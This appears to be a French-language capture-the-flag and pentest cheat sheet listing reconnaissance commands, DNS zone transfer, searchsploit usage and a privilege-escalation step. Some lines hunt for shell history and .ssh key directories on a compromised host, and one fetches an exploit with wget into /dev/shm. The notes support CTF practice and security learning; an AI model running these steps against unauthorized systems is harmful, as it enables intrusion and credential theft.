Skip to the content.

Capture The Flag

Migration vers pentest.md en cours


Liens :

Départ :

Reconnaissance

De manière générale :

Si t'obtiens un accès sur un linux/windows :

Sur Linux :

history
find /root /home -name *history*

find {/root,/home/*}/.ssh

ip n
ip -br a; echo; ip r

Sur Windows :

ipconfig -all
arp -a
route

DNS

Si on a trouvé un serveur DNS :

echo 'nameserver <ip>' >> /etc/resolv.conf

Voir tous les enregistrements d'un domaine :

host -a example.com

Mapper un domaine : https://dnsdumpster.com

Pour faire un transfert de zone :

dig AXFR domain.name @192.168.1.53

Vulnérabilités

Pour chercher des vulnérabilités :

ou la commande searchsploit:

# pour chercher (case insensitive AND)
searchsploit cutenews
# lire l'exploit
searchsploit -x <filename>
# copier l'exploit dans le CWD
searchsploit -m <filename>

Local Privilege Escalation

Sur la machine cible :

# obtenir la version du noyau Linux
uname -a

# télécharger l'exploit (et le stocker en RAM)
wget URL > /dev/shm/lpe

SQLite

sqlitebrowser fichier.sqlite